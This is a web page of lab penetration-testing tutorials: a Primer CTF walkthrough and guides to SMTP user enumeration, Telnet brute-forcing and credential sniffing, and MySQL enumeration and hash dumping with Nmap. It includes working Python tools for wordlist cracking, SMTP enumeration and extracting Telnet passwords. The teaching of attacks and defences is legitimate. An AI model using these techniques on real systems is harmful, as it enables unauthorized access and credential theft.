Hack the Primer VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as Primer. The credit for making this VM goes to “couchsofa”, and it is another boot2root challenge where we have to root the VM to complete it. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.1.115, but you will have to find your own):

netdiscover

Use nmap for port and service enumeration:

nmap -sV 192.168.1.115

We find that port 80 is open, so we open the IP address in our browser.

We use dirb to list the directories and find robots.txt:

dirb http://192.168.1.115/ -w

Inside robots.txt we find a link to a page.

We open this link; it leads to a page with a story written on it.

We take a look at the source code of the page and find another link.

When we open that link, we find yet another link on the page.

When we open this one, we are prompted for a password.

We capture the request for this page in Burp Suite and send it to Repeater. In the server's response we find another link.

When we open that link, we find another page that prompts for a password.

Now we take a look at the URL. The part after the underscore looks like an MD5 hash, so we strip the leading number and the underscore and look the hash up, which gives something interesting.

The URL paths are prime numbers converted to MD5 hashes: we are on page 7, and its hash is the MD5 of 17, the 7th prime. So we convert 19 (the next prime) to an MD5 hash.

To open the next page we add “8_” in front of the hash to complete the URL. We open it in our browser and find a page.
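The URL scheme above is predictable, so instead of hashing the next prime by hand you can generate every page in the sequence. The following is an added example, not code from the original walkthrough or from the VM author; the base URL is assumed from the setup above, and next_page_url() checks that the path you give it really follows the scheme before predicting the next one.

```python
import hashlib

# Added example for the Primer URL scheme: page N lives at "<N>_<md5 of the N-th prime>".
# BASE_URL is an assumption taken from the walkthrough's lab setup.
BASE_URL = "http://192.168.1.115/"


def nth_prime(n):
    """Return the n-th prime, 1-based: nth_prime(7) == 17, nth_prime(8) == 19."""
    if n < 1:
        raise ValueError("n must be >= 1")
    primes = []
    candidate = 2
    while len(primes) < n:
        # trial division by the primes found so far, up to sqrt(candidate)
        if all(candidate % p for p in primes if p * p <= candidate):
            primes.append(candidate)
        candidate += 1
    return primes[-1]


def page_token(page):
    """MD5 hex digest of the decimal n-th prime, which is the hash the site embeds."""
    return hashlib.md5(str(nth_prime(page)).encode()).hexdigest()


def page_url(page):
    return f"{BASE_URL}{page}_{page_token(page)}"


def next_page_url(current_path):
    """Given a path such as '7_<hash>', predict the URL of the next page.
    Raises ValueError when the hash is not md5(prime #N): that catches a wrong
    guess about the scheme before you start firing requests at the server."""
    index_str, _, digest = current_path.strip("/").partition("_")
    page = int(index_str)
    if digest.lower() != page_token(page):
        raise ValueError(f"path does not match the md5(prime #{page}) scheme")
    return page_url(page + 1)


if __name__ == "__main__":
    for p in range(1, 10):
        print(p, nth_prime(p), page_url(p))
```

Running the block prints the first nine page URLs; feeding the path of any page you have already reached to next_page_url() gives the next one.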

We take a look at the source code and find another URL.

We open it and find a custom terminal that uses JavaScript to execute certain commands.

In the ~/usr/falken/ folder we find a hint, and when we look at the running processes we find a command that we need to run.

When we run connect [email protected] it prompts for a password. The log files hint that the password might be related to Joshua, and they also give his date of birth: 6 August 1984. We use cupp to create a dictionary file from that.

We use Burp Suite to brute-force the password with the dictionary and find that it is joshua1984.

When we log in, we again find a page with a terminal.

We check the files and find a few log files that are encoded. We use the decode command provided by the terminal to decode them.

There we find our next clue. We googled “trivial zero” and found it was discovered by Riemann. We use cupp to create a dictionary from the given information.

We use Burp Suite to brute-force the password and find it to be Riemann.

When we log in we are again presented with another terminal.

Looking through the files we find MD5 hashes stored against the usernames. We check the processes and again find a command.

When we crack the MD5 hashes, we find that they are the passwords for the respective usernames.
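Both password steps above (joshua1984 from a name plus date of birth, Riemann from a name alone) and the MD5 cracking step come down to the same two pieces: build a targeted wordlist, then hash every candidate and look the targets up. The block below is an added example, not code from the walkthrough or from cupp itself; it mimics cupp's name-plus-date combinations, and every name, date and digest in it is constructed for the demonstration.

```python
import hashlib

# Added example: cupp-style targeted wordlist plus an MD5 dictionary attack.
# Names, dates and digests here are constructed for the demonstration.


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def targeted_wordlist(names, dob=None):
    """Combine case variants of each name with date fragments, the way cupp does.
    dob is (year, month, day) or None when no date is known."""
    date_bits = [""]                        # the bare name is always a candidate
    if dob:
        year, month, day = dob
        y4, y2 = str(year), f"{year % 100:02d}"
        mm, dd = f"{month:02d}", f"{day:02d}"
        date_bits += [y4, y2, mm, dd, dd + mm, mm + dd, dd + mm + y4, dd + mm + y2, dd + y4]
    words = set()
    for name in names:
        for base in {name, name.lower(), name.capitalize(), name.upper()}:
            for bit in date_bits:
                words.add(base + bit)       # joshua1984
                words.add(bit + base)       # 1984joshua
    return sorted(words)


def crack_md5(targets, wordlist):
    """Map each target digest (lower-cased) to the matching word, or None.
    Hash each word once, then do dictionary lookups: the cost is the size of
    the wordlist, not wordlist x targets, which is how john/hashcat scale too."""
    lookup = {md5_hex(w): w for w in wordlist}
    return {t.lower(): lookup.get(t.lower()) for t in targets}


if __name__ == "__main__":
    words = targeted_wordlist(["joshua"], dob=(1984, 8, 6)) + targeted_wordlist(["riemann"])
    sample_hashes = [md5_hex("joshua1984"), md5_hex("Riemann"), md5_hex("notinlist")]  # constructed
    for digest, word in crack_md5(sample_hashes, words).items():
        print(digest, "->", word or "(not in wordlist)")
```

Burp Intruder and cupp do exactly this against the login form; the point of doing it locally first is that a hash found in a file can be cracked offline without sending a single request to the target.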

When we log in, we are again presented with another terminal.

Looking through the files we find a username, a password and a hostname.

We use these to log in and find a page greeting us with the end of the challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

4 ways to SMTP Enumeration

We can find out the version and the valid users of an SMTP server using telnet. Execute the following command to connect to the service and read its banner.

Telnet

telnet 192.168.1.107 25

From the given image you can observe that the banner “220 mail.ignite.lab ESMTP Postfix” reveals that Postfix is installed on the target machine.

You can guess valid user accounts with the VRFY command; a reply code of 550 means the account is unknown:

vrfy [email protected]

If you receive reply code 250, 251 or 252, the server has accepted the request and the account is valid. Note that 252 strictly means “cannot verify, but will accept mail for this address”; it only tells you something when the same server answers 550 for names that do not exist, which Postfix does.

But if you receive reply code 550, the account is invalid, as shown in the given image:

vrfy [email protected]

Metasploit

The SMTP service has two commands that allow the enumeration of users: VRFY (which confirms the names of valid users) and EXPN (which reveals the actual addresses behind aliases and mailing lists). Metasploit's smtp_enum module uses these commands to reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum

msf auxiliary(smtp_enum) > set rhosts 192.168.1.107

msf auxiliary(smtp_enum) > set rport 25

msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt

msf auxiliary(smtp_enum) > exploit

From the given image you can read the valid usernames found on the target server; the module also grabs the SMTP banner.

smtp-user-enum

smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn't been done as of v1.0.

Type the following command to enumerate usernames using a dictionary of usernames:

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M mode: method to use for username guessing: EXPN, VRFY or RCPT

-U file: file of usernames to check via the SMTP service

-t host: server host running the SMTP service

From the given image you can see that out of 7 queries only 5 names are valid and exist on the SMTP server.

Type the following command to verify a user's e-mail address on the mail server:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

-D dom: domain to append to the supplied user list to make e-mail addresses; use this option when you want to guess valid e-mail addresses instead of just usernames.

From the given image you can see it reports raj@mail.ignite.lab as a valid e-mail address for user raj.

iSMTP

iSMTP is a Kali Linux tool for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relaying.

Type the following command to enumerate valid e-mail IDs on the target server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h <host>: the target IP and port (IP:port)

-e <file>: enable SMTP user enumeration testing and import the e-mail list

From the given image you can see that the text in blue refers to valid e-mail accounts and the text in red to invalid ones.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

Penetration Testing on Telnet (Port 23)

Welcome to internal penetration testing on a Telnet server, where you will learn Telnet installation and configuration, enumeration and attack, and the security precautions to take.

From Wikipedia

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!

Requirements

Telnet Server: Ubuntu

Attacker system: Kali Linux

Telnet Installation & Configuration in 3 steps

Installing a Telnet server is simple; it is activated by the following three steps:

  • Open the terminal in Ubuntu and type the command below with root access (xinetd is the super-server that will spawn the Telnet daemon; telnetd is the server itself, the telnet package is only the client).

apt-get install xinetd telnetd

  • Open /etc/inetd.conf, add the statement below, then save it.

gedit /etc/inetd.conf

telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd

  • Now open /etc/xinetd.conf and check that it contains the following configuration, then save it. This is the stock file; the includedir line at the end makes xinetd also read the per-service definitions in /etc/xinetd.d.

gedit /etc/xinetd.conf

# Simple configuration file for xinetd
#
# Some defaults, and include /etc/xinetd.d/

defaults
{
# Please note that you need a log_type line to be able to use log_on_success
# and log_on_failure. The default is the following :
# log_type = SYSLOG daemon info

instances = 60
log_type = SYSLOG authpriv
log_on_success = HOST PID
log_on_failure = HOST
cps = 25 30
}

includedir /etc/xinetd.d

Now execute the following command to restart the service:

sudo /etc/init.d/xinetd restart

You can check whether the Telnet service is active by scanning your own system with nmap:

nmap -p 23 127.0.0.1

If the service is active on the target server, nmap shows STATE open for port 23.

SSH Banner grabbing through telnet

Telnet plays an important role in banner grabbing for other services running on a target system. Open the terminal in Kali Linux and type the following command to find the version of the SSH service running on the target machine:

telnet 192.168.0.106 22

From the given image you can observe that the banner “SSH-2.0-OpenSSH_6.6.1p1” shows that OpenSSH 6.6.1p1 is installed on the target machine.

SMTP Banner grabbing through telnet

Similarly, we can find out the version and the valid users of an SMTP server using telnet. Execute the following command to connect to the service and read its banner:

telnet 192.168.0.25 25

From the given image you can observe that the banner “220 mail.ignite.lab ESMTP Postfix” reveals that Postfix is installed on the target machine.

You can guess valid user accounts with the VRFY command; a reply code of 550 means the account is unknown:

vrfy [email protected]

If you receive reply code 250, 251 or 252, the server has accepted the request and the account is valid (252 strictly means the server will not confirm the user but will accept mail for it, so compare it with the reply you get for a name that does not exist).

But if you receive reply code 550, the account is invalid, as shown in the given image:

vrfy [email protected]
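The manual VRFY exchange shown here, and the same procedure in the SMTP enumeration article earlier on this page (VRFY, EXPN and the RCPT TO mode of smtp-user-enum), can be driven from a few lines of Python so that the reply codes are captured rather than read off a screen. This is an added example, not code from either article or from any of the tools they use; the host, port and user names are assumptions, and ScriptedServer replays constructed replies so the block runs offline.

```python
import socket

# Added example: VRFY / EXPN / RCPT TO user enumeration with the reply codes
# the articles discuss. Host, port and user names are assumptions.

TIMEOUT = 5


class SmtpSession:
    """Minimal SMTP client over anything with makefile()/sendall() (a socket).
    read_reply() handles multi-line replies: "250-..." lines continue, "250 " ends."""

    def __init__(self, conn):
        self.conn = conn
        self.rfile = conn.makefile("rb")
        self.banner = self.read_reply()   # e.g. (220, "220 mail.ignite.lab ESMTP Postfix")

    def read_reply(self):
        lines = []
        while True:
            raw = self.rfile.readline()
            if not raw:
                raise ConnectionError("server closed the connection")
            line = raw.decode("utf-8", "replace").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":   # a space after the code ends the reply
                break
        return int(lines[-1][:3]), "\n".join(lines)

    def cmd(self, text):
        self.conn.sendall((text + "\r\n").encode())
        return self.read_reply()


def classify(code):
    """Turn a VRFY/EXPN/RCPT reply code into a verdict.
    250/251: user confirmed. 252: server will not confirm but will accept mail,
    which proves nothing on its own and only means something when the same
    server answers 550 for names that do not exist (Postfix behaves this way).
    550/551/553: address rejected."""
    if code in (250, 251):
        return "valid"
    if code == 252:
        return "accepted"
    if code in (550, 551, 553):
        return "invalid"
    return "unknown"


def enumerate_users(conn, users, mode="VRFY", domain=None, sender="probe@example.invalid"):
    """Return {user: (code, verdict)} using VRFY, EXPN or RCPT (RCPT TO)."""
    s = SmtpSession(conn)
    s.cmd("EHLO probe.example.invalid")
    if mode == "RCPT":
        s.cmd(f"MAIL FROM:<{sender}>")       # RCPT TO is only valid after MAIL FROM
    results = {}
    for user in users:
        target = f"{user}@{domain}" if domain else user
        if mode == "RCPT":
            code, _ = s.cmd(f"RCPT TO:<{target}>")
        else:
            code, _ = s.cmd(f"{mode} {target}")
        results[user] = (code, classify(code))
    s.cmd("QUIT")
    return results


def enumerate_host(host, port, users, **kw):
    """The same check against a live server (host and port are assumptions)."""
    with socket.create_connection((host, port), timeout=TIMEOUT) as conn:
        return enumerate_users(conn, users, **kw)


class ScriptedServer:
    """Fake connection that replays constructed replies, one per readline()."""

    def __init__(self, replies):
        self.replies = list(replies)
        self.sent = []                        # every command we transmitted

    def makefile(self, mode):
        return self

    def readline(self):
        return self.replies.pop(0) if self.replies else b""

    def sendall(self, data):
        self.sent.append(data.decode())


if __name__ == "__main__":
    postfix_like = ScriptedServer([            # constructed replies, Postfix style
        b"220 mail.ignite.lab ESMTP Postfix\r\n",
        b"250-mail.ignite.lab\r\n", b"250 VRFY\r\n",     # multi-line EHLO reply
        b"252 2.0.0 raj\r\n",
        b"550 5.1.1 <nobody>: Recipient address rejected: User unknown in local recipient table\r\n",
        b"221 2.0.0 Bye\r\n",
    ])
    print(enumerate_users(postfix_like, ["raj", "nobody"], mode="VRFY"))
    # live lab host: enumerate_host("192.168.1.107", 25, ["raj", "nobody"], mode="RCPT", domain="mail.ignite.lab")
```

RCPT TO is the mode to fall back on when a server answers 502 to VRFY and EXPN, since it has to evaluate the recipient to accept or reject mail; the verdicts are only as good as the difference between the replies for real and bogus names, so always include a name you know does not exist.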

Telnet Banner Grabbing through Metasploit

An attacker always performs enumeration to find information such as software versions (known as banner grabbing) and then checks whether that version is vulnerable to any known exploit.

Open the terminal in Kali Linux and load the Metasploit framework; now type the following commands to scan for the Telnet version:

use auxiliary/scanner/telnet/telnet_version

msf auxiliary(telnet_version) > set rhosts 192.168.0.106

msf auxiliary(telnet_version) > set rport 23

msf auxiliary(telnet_version) > set threads 5

msf auxiliary(telnet_version) > exploit

From the given image you can read the highlighted text, which shows the Telnet version installed on the target's system.

Brute Force Attack

An attacker often tries a brute-force attack to steal credentials for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type the following commands to brute-force the Telnet login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.106

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

From the given image you can observe that our Telnet server is not secure against brute force: the module found the matching combination username: raj and password: 123, and at the same time opened the victim's command shell as session 1.

From the given image you can see that we now have unauthorized access to the victim's system as user raj, and have executed ifconfig to verify the network interfaces.

We can also upgrade the command shell into a Meterpreter shell with the following command:

sessions -u 1

From the given image you can see that we now have two sessions: the first is the command shell session and the second the Meterpreter session.

Stealing credential through sniffing

Telnet, by default, does not encrypt any data sent over the connection (including passwords), so it is often feasible to eavesdrop on the communication and use the password later for malicious purposes; anybody with access to the network between the two hosts can intercept the packets passing between source and destination and obtain the login, the password and the session data.

From the given image you can observe that the client is logging in to the Telnet server by submitting valid credentials while, on the other hand, the attacker is sniffing the network packets using Wireshark or a similar tool.

Here you can notice that Wireshark has captured the Telnet session by sniffing the network. Telnet behaves like FTP in this respect: users authenticate with a clear-text username and password, so an attacker can read the login credentials straight out of the capture.

From the image below you can read the username: raj and password: 123, along with the complete conversation travelling between source and destination.
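What Wireshark's “Follow TCP Stream” does for the capture above can be reproduced in a few lines, which also shows why the password is still readable even though each keystroke travels in its own packet mixed with option negotiation. The block below is an added example, not code from the article; SAMPLE_PACKETS is a constructed capture in (direction, payload) form standing in for the packets a real pcap would give you.

```python
# Added example: recover Telnet login credentials from a captured stream.
# Telnet packets carry IAC option negotiation mixed with typed characters,
# and in character-at-a-time mode the password arrives one keystroke per
# packet. SAMPLE_PACKETS below is constructed, not a real capture.

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def strip_telnet_options(chunk, carry=b""):
    """Remove IAC negotiation from one chunk of a Telnet stream.
    Returns (clean_bytes, leftover): leftover is an IAC sequence cut off at the
    packet boundary, to be passed back as carry together with the next chunk."""
    buf = carry + chunk
    out = bytearray()
    i = 0
    while i < len(buf):
        b = buf[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= len(buf):                 # lone IAC at the end: wait for more
            return bytes(out), buf[i:]
        cmd = buf[i + 1]
        if cmd == IAC:                        # IAC IAC is a literal 0xFF data byte
            out.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):   # three bytes: IAC <cmd> <option>
            if i + 2 >= len(buf):
                return bytes(out), buf[i:]
            i += 3
        elif cmd == SB:                       # subnegotiation runs until IAC SE
            end = buf.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                return bytes(out), buf[i:]
            i = end + 2
        else:                                 # NOP, AYT, GA and friends: two bytes
            i += 2
    return bytes(out), b""


def extract_logins(packets):
    """Return [(username, password), ...] for every completed login attempt.
    The server's prompt decides what the client is typing next; the client's
    keystrokes are collected up to the CR that ends the line."""
    carry = {"c2s": b"", "s2c": b""}
    attempts, typed = [], bytearray()
    expect, pending_user = None, None
    for direction, payload in packets:
        clean, carry[direction] = strip_telnet_options(payload, carry[direction])
        if direction == "s2c":
            text = clean.decode("latin-1").lower()
            if "password:" in text:
                expect, typed = "password", bytearray()
            elif "login:" in text:            # also matches "Last login:", harmless: no password follows
                expect, typed = "username", bytearray()
            continue
        for b in clean:
            if expect is None:
                break
            if b in (0x0D, 0x0A):             # Enter arrives as CR NUL or CR LF
                value = typed.decode("latin-1")
                if expect == "username":
                    pending_user = value
                else:
                    attempts.append((pending_user, value))
                expect, typed = None, bytearray()
            elif b == 0x00:
                continue
            elif b in (0x08, 0x7F):           # backspace / DEL: the user corrected a typo
                typed = typed[:-1]
            else:
                typed.append(b)
    return attempts


SAMPLE_PACKETS = [                             # constructed, mirrors a Linux telnetd login
    ("s2c", b"\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23\xff\xfd\x27"),    # DO TTYPE, TSPEED, XDISPLOC, NEW-ENVIRON
    ("c2s", b"\xff\xfb\x18\xff\xfb\x20\xff\xfb\x23\xff\xfb\x27"),    # WILL ...
    ("s2c", b"\xff\xfa\x18\x01\xff\xf0"),                            # SB TTYPE SEND IAC SE
    ("c2s", b"\xff\xfa\x18\x00XTE"),                                 # SB TTYPE IS "XTERM" split
    ("c2s", b"RM\xff\xf0"),                                          #   across two packets
    ("s2c", b"\xff\xfb\x01\xff\xfb\x03Ubuntu 14.04 LTS\r\nubuntu login: "),  # WILL ECHO, WILL SGA
    ("c2s", b"\xff\xfd\x01\xff\xfd\x03"),                            # DO ECHO, DO SGA
    ("c2s", b"r"), ("s2c", b"r"), ("c2s", b"a"), ("s2c", b"a"),      # username echoed by the server
    ("c2s", b"j"), ("s2c", b"j"), ("c2s", b"\r\x00"),
    ("s2c", b"\r\nPassword: "),
    ("c2s", b"1"), ("c2s", b"2"), ("c2s", b"3"), ("c2s", b"\r\x00"), # password is not echoed
    ("s2c", b"\r\nLast login: Mon Aug  7 10:00:00 2017\r\nraj@ubuntu:~$ "),
    ("c2s", b"ifconfig\r\x00"),
]

if __name__ == "__main__":
    for user, password in extract_logins(SAMPLE_PACKETS):
        print(f"username: {user}  password: {password}")
```

Nothing in the protocol protects the password: the only thing between the attacker and “raj / 123” is stripping the negotiation bytes, and a real capture differs from the sample only in having to pull the payloads out of a pcap first.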

Extensions exist that add Transport Layer Security (TLS) and Simple Authentication and Security Layer (SASL) authentication to Telnet, but most implementations do not support them, which is why the Secure Shell (SSH) protocol, first released in 1995, replaced Telnet for remote login.

Secure Telnet through Port forwarding

To make the Telnet server harder to find, an admin can move the service from its default port to a non-standard one (the heading calls this port forwarding, but it is only a port change). Open the services file to make the change:

gedit /etc/services

From the given image you can see that telnet uses port 23 by default; change the port number for the telnet service.

From the image below you can compare that we have changed port 23 to 2323. Now restart the service:

service xinetd restart

Verify it with nmap as shown below. Note that this only hides the service from someone who scans port 23; a full-range scan with -sV still identifies the service as telnet, so treat the port change as obscurity rather than a real control:

nmap -p 2323 -sV 192.168.0.106

Secure telnet against brute force attack

You can protect the Telnet server against brute force and unauthorized access by adding a filter with iptables: allow only a specific IP address to connect to the Telnet server and drop connections from every other address.

Now type the following commands with root permission to add the filter to iptables. Order matters: -A appends to the chain, so the ACCEPT rule must be added before the DROP rule.

iptables -A INPUT -s 192.168.0.104 -p tcp --dport 23 -j ACCEPT

The above command allows traffic from IP address 192.168.0.104 to reach the Telnet service on port 23.

iptables -A INPUT -p tcp --dport 23 -j DROP

The above command drops traffic arriving on port 23 from any other IP address.

The rules take effect immediately, so restarting xinetd is not strictly required, but it does no harm. Note that rules added this way are lost at reboot unless you save them (for example with iptables-save or the iptables-persistent package).

sudo /etc/init.d/xinetd restart

Let us verify the iptables rules by connecting to the Telnet server from the client machine with IP address 192.168.0.104.

Great!! Connection established successfully.

You can confirm it from the image below.

Now let us verify the rules by connecting to the Telnet server from the attacker machine, which has a different IP address.

From the image below you can see that nothing happens, because the server drops every packet to port 23 from other addresses.

Awesome!! It means that even if an attacker sniffs valid credentials, they will not be able to reach the Telnet server from their own address. The credentials still cross the network in clear text, though, and an attacker who can spoof or compromise the allowed host is not stopped; replacing Telnet with SSH removes the problem at its root.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets. Contact here

MySQL Penetration Testing with NMAP

In this article we discuss MySQL penetration testing using Nmap, where you will learn how to retrieve database information such as database names, table records, usernames, passwords and so on.

MySQL is an open-source relational database management system that uses Structured Query Language (SQL) to create and query database records.

Lets Begin !!!

Scanning for port 3306

Open the terminal and type the following command to check whether the MySQL service is active on the target system; by default MySQL listens on port 3306.

nmap -sT 192.168.1.216

From the given image you can observe that port 3306 is open for the MySQL service, so let us enumerate it.

Retrieve mysql information

Now type another command to retrieve MySQL information such as the version and protocol:

nmap --script=mysql-info 192.168.1.216

The script connects to the MySQL server and prints what the server announces in its handshake: protocol 10, version 5.5.57-0ubuntu0.14.04.1, thread ID 159, status autocommit, the capability flags and the password salt, as shown in the image below. The capability flags are worth reading: if SSL support is not among them, every login and query to this server crosses the network in clear text.
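Everything mysql-info prints comes from a single packet the server sends before the client says anything, the protocol version 10 “Initial Handshake”. The block below is an added example, not code from the article or from Nmap's script, that parses that packet and flags whether SSL is offered; build_sample_handshake() constructs a packet mirroring the values quoted in the text (version, thread ID, autocommit), with made-up salt bytes and capability flags, so the block runs offline, and grab_handshake() does the same against a live host you name.

```python
import socket
import struct

# Added example: parse the MySQL protocol-10 Initial Handshake Packet that
# mysql-info summarises. The sample packet is constructed, not captured.

CLIENT_SSL = 0x0800
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x80000
SERVER_STATUS_AUTOCOMMIT = 0x0002


def parse_handshake(packet):
    """Parse the first packet a MySQL server sends on a new TCP connection."""
    length = int.from_bytes(packet[:3], "little")    # 3-byte payload length
    seq = packet[3]                                   # sequence id, 0 for the greeting
    body = packet[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated packet")
    if body[0] != 10:
        raise ValueError(f"unsupported protocol version {body[0]}")
    end = body.index(b"\x00", 1)
    version = body[1:end].decode()                    # NUL-terminated server version
    pos = end + 1
    thread_id = struct.unpack_from("<I", body, pos)[0]
    pos += 4
    salt = body[pos:pos + 8]                          # auth-plugin-data part 1
    pos += 8 + 1                                      # plus one filler byte
    cap_low, charset, status, cap_high = struct.unpack_from("<HBHH", body, pos)
    pos += 7
    capabilities = cap_low | (cap_high << 16)
    auth_len = body[pos]
    pos += 1 + 10                                     # length byte plus 10 reserved bytes
    if capabilities & CLIENT_SECURE_CONNECTION:
        part2 = max(13, auth_len - 8)                 # part 2 of the salt, NUL-terminated
        salt += body[pos:pos + part2].rstrip(b"\x00")
        pos += part2
    plugin = None
    if capabilities & CLIENT_PLUGIN_AUTH:
        plugin = body[pos:body.index(b"\x00", pos)].decode()
    return {
        "sequence": seq,
        "version": version,
        "thread_id": thread_id,
        "salt": salt,
        "charset": charset,
        "capabilities": capabilities,
        "ssl_offered": bool(capabilities & CLIENT_SSL),     # False: logins go in the clear
        "autocommit": bool(status & SERVER_STATUS_AUTOCOMMIT),
        "auth_plugin": plugin,
    }


def grab_handshake(host, port=3306, timeout=5):
    """Read and parse the greeting from a live server (host is an assumption)."""
    with socket.create_connection((host, port), timeout=timeout) as conn:
        return parse_handshake(conn.recv(4096))


def build_sample_handshake():
    """Constructed packet for the demonstration, not captured from a real server."""
    version = b"5.5.57-0ubuntu0.14.04.1"
    salt = b"abcdefgh" + b"ijklmnopqrst"              # 8 + 12 made-up scramble bytes
    caps = (0xFFFF & ~CLIENT_SSL) | CLIENT_PLUGIN_AUTH  # every low flag except SSL
    body = bytes([10]) + version + b"\x00"
    body += struct.pack("<I", 159) + salt[:8] + b"\x00"
    body += struct.pack("<HBHH", caps & 0xFFFF, 8, SERVER_STATUS_AUTOCOMMIT, caps >> 16)
    body += bytes([len(salt) + 1]) + b"\x00" * 10
    body += salt[8:] + b"\x00" + b"mysql_native_password\x00"
    return len(body).to_bytes(3, "little") + b"\x00" + body


if __name__ == "__main__":
    info = parse_handshake(build_sample_handshake())
    print(info["version"], "thread", info["thread_id"],
          "autocommit" if info["autocommit"] else "",
          "SSL offered" if info["ssl_offered"] else "no SSL: credentials go in the clear")
```

The salt is sent to every client that connects, which is why the server can leak it to an unauthenticated scanner; it is not secret, but a server that omits CLIENT_SSL from its capabilities is telling you that the password hash exchange and all subsequent queries can be sniffed exactly like the Telnet session in the previous article.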

Brute force attack

This command uses dictionaries of usernames and passwords and tries every combination against MySQL in a brute-force attack:

nmap -p 3306 --script mysql-brute --script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From the given image you can observe that it found the valid credentials root:toor, which let us log in to the MySQL server directly.

Retrieve mysql user names

This command fetches the MySQL user names, authenticating with the arguments mysqluser=root and mysqlpass=toor:

nmap -p 3306 --script=mysql-users 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can see that we found four user names: root, debian-sys-maint, sr and st.

Retrieve database names

This command fetches the MySQL database names, authenticating with the arguments mysqluser=root and mysqlpass=toor:

nmap -p 3306 --script=mysql-databases 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can read the name of the created database, ignite.

This command performs the same task, but retrieves the database names by running the MySQL query “show databases”:

nmap -p 3306 192.168.1.216 --script mysql-query --script-args "query=show databases,username=root,password=toor"

From the image below you can again read the name of the created database, ignite.

Retrieve mysql variable status ON/OFF

The variables listed here are the server's system variables (what the query “show variables” returns), not user-defined variables. Values such as version, datadir, local_infile, secure_file_priv and have_ssl tell you where the data lives, whether the server will read local files for a client, and whether connections can be encrypted.

This command fetches the MySQL variables, authenticating with the arguments mysqluser=root and mysqlpass=toor:

nmap -p 3306 --script=mysql-variables 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the given image you can observe the ON/OFF status of each MySQL variable.

Retrieve Hash password

This command dumps the password hashes from the MySQL server in a format suitable for cracking with tools such as John the Ripper (the mysql-dump-hashes script takes username and password as its arguments):

nmap -p 3306 --script=mysql-dump-hashes 192.168.1.216 --script-args username=root,password=toor

From the given image you can observe that it has dumped the password hash of each user we enumerated above.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here
